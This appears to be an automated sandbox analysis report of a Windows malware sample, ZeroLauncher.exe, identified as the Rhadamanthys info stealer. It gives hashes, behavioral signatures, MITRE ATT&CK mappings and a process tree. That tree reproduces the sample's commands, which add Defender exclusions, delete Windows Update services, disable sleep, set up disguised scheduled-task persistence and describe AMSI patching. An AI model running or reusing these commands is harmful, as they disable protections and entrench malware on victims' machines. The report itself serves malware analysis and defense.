Analysis
max time kernel: 150s
max time network: 150s
platform: windows11-21h2_x64
resource: win11-20240802-en
resource tags: arch:x64, arch:x86, image:win11-20240802-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 04-10-2024 04:54
Static task: static1
Behavioral task: behavioral1
Sample: ZeroLauncher.exe
Resource: win11-20240802-en

General
Target: ZeroLauncher.exe
Size: 19KB
MD5: 982e4ae4559538cfb529dfaff0507880
SHA1: a3b0e3989d6e40792134286e40448004ebeda077
SHA256: 95a08f9fd8741d2b265a43143289af012ca24cee776609bc79337d63988246fd
SHA512: 35d23d332c0389b3d3e7086613e60d73c158a7dd408bc4320ccb10aba8c2755ea99bf0d484cd257d53d42a6fe95a9bab0c606e7c580039aa5334767a4096662f
SSDEEP: 384:/LVHmcPXblyCKGK9dnORWsK7PPZzcuIYZKJHtZW39cDpbJO:/hHHPbICKJEW7PPeQKy6db
Malware Config
Signatures
Modifies security service 2 TTPs 5 IoCs
description | ioc | Process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description | pid | Process | procid_target
PID 2416 created 3328 | 2416 | LicSend.exe | 52
PID 2416 created 3328 | 2416 | LicSend.exe | 52
PID 2416 created 3328 | 2416 | LicSend.exe | 52
PID 2416 created 3328 | 2416 | LicSend.exe | 52
PID 2416 created 3328 | 2416 | LicSend.exe | 52
PID 3968 created 644 | 3968 | powershell.EXE | 5
Blocklisted process makes network request 1 IoCs
flow | pid | Process
3 | 2848 | powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid | Process
4884 | powershell.exe
5108 | powershell.exe
552 | powershell.EXE
3968 | powershell.EXE
Drops file in Drivers directory 1 IoCs
description | ioc | Process
File created | C:\Windows\System32\drivers\etc\hosts | LicSend.exe
Executes dropped EXE 4 IoCs
pid | Process
2652 | LicenseGet.exe
2100 | LicCheck.exe
2416 | LicSend.exe
4656 | svcupdater.exe
Indicator Removal: Clear Windows Event Logs 1 TTPs 3 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description | ioc | Process
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx | svchost.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow | ioc
1 | bitbucket.org
3 | bitbucket.org
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
Power Settings 1 TTPs 5 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid | Process
3052 | powercfg.exe
3484 | cmd.exe
4152 | powercfg.exe
3880 | powercfg.exe
4860 | powercfg.exe
Drops file in System32 directory 6 IoCs
description | ioc | Process
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | powershell.EXE
File opened for modification | C:\Windows\System32\Tasks\svcupdater | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
Suspicious use of SetThreadContext 2 IoCs
description | pid | Process | procid_target
PID 2416 set thread context of 2376 | 2416 | LicSend.exe | 107
PID 3968 set thread context of 3068 | 3968 | powershell.EXE | 112
Drops file in Program Files directory 1 IoCs
description | ioc | Process
File created | C:\Program Files\Google\Chrome\updater.exe | LicSend.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
4720 | sc.exe
3132 | sc.exe
4768 | sc.exe
4000 | sc.exe
3312 | sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | LicenseGet.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | LicCheck.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | svcupdater.exe
Modifies data under HKEY_USERS 64 IoCs
(64 registry-key IoCs omitted)
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
4944 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
(64 pid/Process IoCs omitted)
Suspicious use of AdjustPrivilegeToken 64 IoCs
(64 token-privilege IoCs omitted)
Suspicious use of WriteProcessMemory 64 IoCs
(64 WriteProcessMemory IoCs omitted)
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
C:\Windows\system32\winlogon.exe
  command line: winlogon.exe
  PID: 644
    C:\Windows\system32\dwm.exe
      command line: "dwm.exe"
      PID: 568
    C:\Windows\System32\dllhost.exe
      command line: C:\Windows\System32\dllhost.exe /Processid:{16c568ad-859b-4e98-a696-079e26fda204}
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      PID: 3068
C:\Windows\system32\lsass.exe
  command line: C:\Windows\system32\lsass.exe
  PID: 704
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
  PID: 996
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
  PID: 1040
C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
  PID: 1048
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
  PID: 1056
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
  PID: 1068
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
  PID: 1148
C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  - Drops file in System32 directory
  PID: 1240
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
      command line: obfuscated PowerShell omitted; decoded, it patches AmsiScanBuffer in amsi.dll inside the PowerShell process and then loads and invokes a .NET assembly stored in the registry value HKLM\SOFTWARE\dialerstager
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - System Location Discovery: System Language Discovery
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      PID: 552
        C:\Windows\System32\Conhost.exe
          command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          PID: 432
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      command line: obfuscated PowerShell omitted; decoded, it patches AmsiScanBuffer in amsi.dll inside the PowerShell process and then loads and invokes a .NET assembly stored in the registry value HKLM\SOFTWARE\dialerstager
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3968
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:616
C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exeC:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4656
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1252
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1332
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1400
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1492
C:\Windows\system32\sihost.exesihost.exe2⤵PID:700
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1608
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1644
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1660
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1668
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1748
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1828
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1860
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1136
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1708
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1808
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2064
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2076
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2204
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2244
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2380
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2388
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2428
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2476
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2500
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2516
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2552
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2564
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2572
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1076
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2776
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3328
C:\Users\Admin\AppData\Local\Temp\ZeroLauncher.exe"C:\Users\Admin\AppData\Local\Temp\ZeroLauncher.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4252
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2848
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3232
C:\Users\Admin\AppData\Local\Temp\LicenseGet.exe"C:\Users\Admin\AppData\Local\Temp\LicenseGet.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2652
C:\Users\Admin\AppData\Local\Temp\LicCheck.exe"C:\Users\Admin\AppData\Local\Temp\LicCheck.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2100
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4944
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5000
C:\Users\Admin\AppData\Local\Temp\LicSend.exe"C:\Users\Admin\AppData\Local\Temp\LicSend.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2416
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4884
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3344
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4720
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3132
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4768
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4000
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:3312
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4212
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:228
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:236
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:2728
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:928
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of WriteProcessMemory
PID:3484
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4152
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3880
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4860
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3052
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5108
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:2376
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3444
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3500
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3856
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3924
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3984
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:4016
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4268
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4356
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4804
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3992
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:2280
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3416
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4468
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3732
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2164
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4556
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3420
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2096
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
- PowerShell (1)
- Scheduled Task/Job (1)
- Scheduled Task (1)
- System Services (1)
- Service Execution (1)
Persistence
- Create or Modify System Process (2)
- Windows Service (2)
- Power Settings (1)
- Scheduled Task/Job (1)
- Scheduled Task (1)
Privilege Escalation
- Create or Modify System Process (2)
- Windows Service (2)
- Scheduled Task/Job (1)
- Scheduled Task (1)
Defense Evasion
- Impair Defenses (1)
- Indicator Removal (1)
- Clear Windows Event Logs (1)
- Modify Registry (1)
- Obfuscated Files or Information (1)
- Command Obfuscation (1)
Downloads